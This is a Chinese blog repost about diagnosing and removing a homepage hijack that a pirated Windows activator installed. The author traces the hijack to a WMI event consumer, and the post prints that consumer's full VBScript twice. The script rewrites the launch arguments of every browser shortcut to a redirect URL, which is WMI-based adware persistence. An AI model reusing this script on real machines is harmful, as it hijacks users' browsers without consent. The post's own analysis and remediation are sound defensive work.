解决hao123劫持chrome主页问题

最新推荐文章于 2023-07-04 13:38:04 发布
最新推荐文章于 2023-07-04 13:38:04 发布
阅读量6.8k 收藏 2
点赞数 1
文章标签: hao524 hao123 IE首页 被

原文链接  :  http://xinghao.me/2016/03/01/2016-03-01-kill-hao123/


前言

最近帮别人激活系统,就下了一个小马激活软件,在电脑上打开了一下,确认能正常运行之后,就给别人发过去了。

本以为没什么事了,过了一段时间之后,像往常一样打开chrome,弹出的不是熟悉的Google主页,而是hao123,那种心情,就是参考文章1中形容的一样,“跟吃了苍蝇一样恶心”。折腾了很久,最后总算是解决了这个问题了。

原因分析

首先检查了一下chrome的主页设置,发现没有问题,依然是原来的google.com。

然后到chrome的安装目录,直接双击打开chrome程序,没有问题。

然后检查快捷方式。因为我把chrome固定到任务栏上,一般使用的时候都是点击任务栏图标的,而实际上这只是一个快捷方式。右键任务栏chrome图标->右键Google Chrome->属性,就会弹出该快捷方式的属性窗口。发现快捷方式的目标链接已经被修改,多加了一个启动参数:

1

"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" http://hao.169x.cn/?v=108

而这个网址,打开之后就会重定向到hao123.com。

原因找出来了,出现主页被胁持的原因是系统里所有跟chrome有关的快捷方式都被修改,加了一个启动参数导致每次被启动时候都会跳转到这个网址。除了任务栏快捷方式之外,开始菜单中跟chrome有关的所有快捷方式都无一幸免。

修复尝试

定位出这个原因之后,结合网上的一些方法,进行了很多的尝试,最后也没有彻底解决:

  • 手动删掉所有快捷方式中的启动参数。这个方法治标不治本,本来以为这样可以解决了,结果隔了一段时间,或者重启系统之后,所有快捷方式又会被恶意修改。

  • 尝试了一下参考文章2的方法,但是找不到文中所说的注册表项和隐藏文件。

  • 在注册表中搜索所有跟hao123相关的内容,然后删除,但是问题仍然存在。

  • 用Everything搜索本地所有跟hao123相关的文件和文件夹,但是删除之后仍然没有解决问题。

  • 最后找到了参考文章1的方法,但是在WMI event viewer中找不到文中所说的_EventFilter:Name=”unown_filter”

  • 重装chrome,但是一段时间之后恶心的hao123又回来了

  • 把所有chrome快捷方式设为只读,但是发现一段时间之后还是被恶意修改了

解决方法

经过这些头痛的尝试之后,决定先一步一步定位出原因,首先是要看一下到底是什么程序修改了chrome快捷方式。下载Process Monitor,菜单栏Filter->filter,在弹出的窗口中,把chrome的快捷方式路径添加到监视中:

注意这时候不要对chrome进行任何操作,包括打开、右键等等,以免造成干扰。监视一段时间之后,就会发现元凶露出了真面目:

就是这个叫scrcons.exe的程序在修改chrome快捷方式。

这时候发现定位出来的原因跟这篇文章中的原因是一样的,于是再次按照文中所说的方法,用WMI Event Viewer查看WMI事件。但仍然没有在root/subscription里面找到可疑项,最后几番查找,终于在root\CIMV2里面揪出了真凶。
首先打开WMI Event Viewer,点击左上角工具栏中的Register for Events按钮,默认就会连接到root\CIMV2,直接点确定即可。

然后在Consumer in root\CIMV2 -> _EventConsumer -> ActiveScriptEventConsumer下,找到了可疑项。

双击ActiveScriptEventConsumer.Name=”VBScriptKids_consumer”,弹出属性页面:

就会发现chrome快捷方式被修改的元凶 — ScriptText:

1

On Error Resume Next:Const link = "http://hao.169x.cn/?v=108":Const link360 = "http://hao.169x.cn/?v=108&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\chenxh\Desktop,C:\Users\chenxh\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\chenxh\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\chenxh\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\chenxh\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:

这个脚本定期就会被系统调用一次,所以就算手动把快捷方式的参数清空,隔一段时间之后又会重新被改回来。

这也是很多流氓软件的常用招数,具体可以参考利用WMI打造完美“三无”后门

恶意脚本分析

上面的VB脚本用冒号作为分隔符,把一段程序写成了一个语句,为了便于理解,把这段脚本重新排版了一下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43

On Error Resume Next
Const link = "http://hao.169x.cn/?v=108"
Const link360 = "http://hao.169x.cn/?v=108&s=3"
browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"

lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\chenxh\Desktop,C:\Users\chenxh\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\chenxh\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\chenxh\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\chenxh\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"

browsersArr = split(browsers,",")
Set oDic = CreateObject("scripting.dictionary")

For Each browser In browsersArr
  oDic.Add LCase(browser), browser
Next
  lnkpathsArr = split(lnkpaths,",")

  Set oFolders = CreateObject("scripting.dictionary")
  For Each lnkpath In lnkpathsArr
    oFolders.Add lnkpath, lnkpath
  Next
    Set fso = CreateObject("Scripting.Filesystemobject")
    Set WshShell = CreateObject("Wscript.Shell")
    For Each oFolder In oFolders
      If fso.FolderExists(oFolder) Then
        For Each file In fso.GetFolder(oFolder).Files
          If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
            Set oShellLink = WshShell.CreateShortcut(file.Path)
            path = oShellLink.TargetPath
            name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
            If oDic.Exists(LCase(name)) Then
              If LCase(name) = LCase("360se.exe") Then
                oShellLink.Arguments = link360
              Else
                oShellLink.Arguments = link
              End If
              If file.Attributes And 1 Then
                file.Attributes = file.Attributes - 1
              End If
              oShellLink.Save
            End If
          End If
       Next
      End If
    Next

可以看到,这段脚本就是遍历所有快捷方式目录(linkpaths)下的所有浏览器(browsers)的快捷方式,然后重新给快捷方式加上启动参数。

至此,飞到嘴里的这只臭苍蝇总算是吐出来了。这也教育我们,要支持正版系统和软件啊!!(正经脸)

张嘴谨慎点,自然不会有苍蝇飞进去了。

参考

[1] 如何手工去除http://www.2345.com/?kunown恶意链接!

[2] hao123、hao.qquu8.com劫持IE、Chrome浏览器被的解决办法

[3] 利用WMI打造完美“三无”后门


AndroidGuy
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
浏览器被hao123hao524劫持解决办法
01-03
解决办法: 1、修改快捷方式、在快捷方式上右击属性对话框手工删除网址的部分 2、加载了启动项的,在注册表、启动项、服务中搜索相关网址信息,找到后删除 3、使用wmitools工具删除wmi恶意代码 压缩包里包括wmitools软件
浏览器主页劫持
12-26
主页被锁定,无法还原,非常讨厌,就算按照网上一般方法重新设置,过半个小时还是出现问题
IE等浏览器快捷方式的主页hao123顽固劫持解决办法
01-06
IE等浏览器快捷方式的主页hao123顽固劫持解决办法。 可以直接清理被篡改的主页。 已经使用火绒安全软件,检查无毒。
浏览器被hao123.com劫持解决办法
01-19
点击谷歌、火狐、百度、IE11等浏览器,全部自动打开流氓网站hao123.com,说明浏览器已被hao123.com劫持,请看解决办法。
hao123主页劫持清除工具
04-10
清除chrome、ie等浏览器的主页劫持,异常链接。清除使用频率过低的垃圾文件夹。
去小马激活首页绑定
chengshu0351的博客
07-04 1340
#问题现象 打开浏览器,默认弹出页面 https://www.hao123.com/?tn=92543205_hao_pg 查看浏览器设置,并没有设置首页 检查浏览器快捷方式属性,发现“目标(T)”栏设置了跳转 C:\Program Files (x86)\Google\Chrome...
浏览器被www.hao123.com重定向了怎么办?
✍千里之行,始于足下 ^,^
09-28 1123
已经困恼多时,对于打开那个浏览器都会重定向到hao123.com 的行为已经快习惯了,但是今天我解决了。 原因就是 小马激活这类激活软件 不能激活还有病毒 淦!!! 虽然重定向无其他坏影响,但是就是不想被控制的感觉让我又一次对它打起来注意 废话不多说,查了很多策略 但是没有用 可能这种首页劫持的病毒已经更加进化聪明了 什么删注册表,修改快捷方式,软件exe文件名。。。 just so so 话不多说隆重登场 火绒 路径 火绒–安全工具–专杀工具–下载就完事了。。 没有火绒就直接下载 下载地址 希望可以拯
谷歌浏览器被hao123网页(或其他网页)劫持了,怎么办?(已解决
热门推荐
qq_44231797的博客
03-05 1万+
关于谷歌浏览器chromehao123、2345、360等主页劫持和捆绑的解决方法
使用KMS激活软件导致浏览器呗篡改解决办法
滑尧伟的博客
07-16 1032
浏览器被首页劫持,主要是在启动程序里面修改了首页。如图 如果这里没有就打开文件所在文章再看一下,把这里修改了只是暂时的好了,一重启发现又被改了。用火绒查找病毒发现其实是这个程序修改了wmiscrpt://root\CIMV2:VBScriptKids_consumer 用WMI工具查看就是下面这个鬼东西 用火绒把这个删除了就解决根本原因了,或者是用WMI事件查看器把这个删除了就ok了。 不同版本可能有区别,大同小异~ WMI工具下载地址https://download.csdn...
chrome 打开默认页 被篡改_为什么 Chrome 浏览器的主页会被篡改为 hao123 ?遇到这种情况要如何修复?...
weixin_39630441的博客
12-21 1017
最近重装了一次电脑。尽管什么百度系的软件我都没有下载,Chrome浏览器的主页还是被硬生生劫持了。每次点开后的主页是http://hao.qquu8.com这个链接,紧接着它会跳向hao123。电脑上原装的其他浏览器(IE和Edge)也是这样,弄得每次打开浏览器就被恶心一下,很是恼火。我们先来看看问题在哪。右键快捷方式查看属性:哦,原来快捷方式被改了,后面加了一段url。把它删了试试?还是不行,几...
解决利用WMI劫持浏览器主页hao123hao916等的修复工具及方法
02-10
该工具为最流行的版本 1.50.1131.1,75% 的安装比例,挺老的。使用完工具,要把所有浏览器的快捷方式,都改好。改完了,删掉任务栏上浏览器的快速启动项,重新添加改完了的浏览器快捷方式。
hao123.exe首页篡改专杀工具
08-21
此为hao123主页篡改专杀工具,对其他主页篡改可能有效!
主页hao123劫持解决WIN7 32BIT
06-17
主页hao123劫持解决方法,在Win7 32bit测试ok。
解决ChromeHao123劫持问题
qq_35284646的博客
06-01 742
解决ChromeHao123劫持问题
浏览器主页hao123劫持解决方案
weixin_43178406的博客
03-06 1万+
本文主要介绍了浏览器主页hao123劫持解决方案,希望能对新手有所帮助。 在这里插入图片描述 文章目录 1. 问题描述 2. 解决方案
Windows 环境Chrome浏览器劫持hao123.com baidu.com 解决办法
07-04 479
Windows 环境Chrome浏览器劫持hao123.com baidu.com 解决办法
取消chrome打开自动跳转到hao123
Everything is i earned
12-26 1万+
最终解决方法:把chrome.lnk重命名就好了,参考知乎改成了chromefuckhao123.lnk,不影响正常打开程序。 修改权限也可以,但是比较麻烦。 原因是这个流氓把chrome.lnk快捷方式后面加上了hao123的网址 修改方法如下: 用everything(搜索工具),找到系统上所有的chrome.lnk,逐个...
springboot(酒店管理系统)
最新发布
04-25
开发语言:Java JDK版本:JDK1.8(或11) 服务器:tomcat 数据库:mysql 5.6/5.7(或8.0) 数据库工具:Navicat 开发软件:idea 依赖管理包:Maven 代码+数据库保证完整可用,可提供远程调试并指导运行服务(额外付费)~ 如果对系统的中的某些部分感到不合适可提供修改服务,比如题目、界面、功能等等... 声明: 1.项目已经调试过,完美运行 2.需要远程帮忙部署项目,需要额外付费 3.本项目有演示视频,如果需要观看,请联系我 4.调试过程中可帮忙安装IDEA,eclipse,MySQL,JDK,Tomcat等软件 重点: 需要其他Java源码联系我,更多源码任你选,你想要的源码我都有! 需要加v19306446185
hao123劫持chrome
09-23
hao123劫持是指浏览器的标签页或主页hao123网址替换,用户在打开浏览器或新建标签页时会被自动重定向到hao123网页。这通常是由恶意软件或浏览器插件所引起的。如果你遇到了这个问题,可以尝试以下解决方法: 1. 检查浏览器的快捷方式是否被修改:右键点击浏览器的桌面快捷方式,选择“属性”,在“目标”字段中查看是否添加了奇怪的网址。如果有,请删除该网址并保存。 2. 清除浏览器的缓存和Cookie:打开浏览器的设置菜单,找到“高级设置”或“隐私和安全”选项,选择“清除浏览数据”或类似的选项,勾选“缓存”和“Cookie和其他站点数据”,点击清除数据按钮。 3. 检查浏览器的扩展和插件:打开浏览器的扩展或插件管理界面,禁用或删除所有不熟悉或可疑的扩展和插件。 4. 运行安全软件进行全面扫描:使用可信赖的安全软件对电脑进行全盘扫描,以查找并清除可能存在的恶意软件。 5. 重置浏览器设置:如果以上方法都没有解决问题,可以尝试重置浏览器的设置到默认状态。具体步骤可以在浏览器的帮助文档或官方网站上找到。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值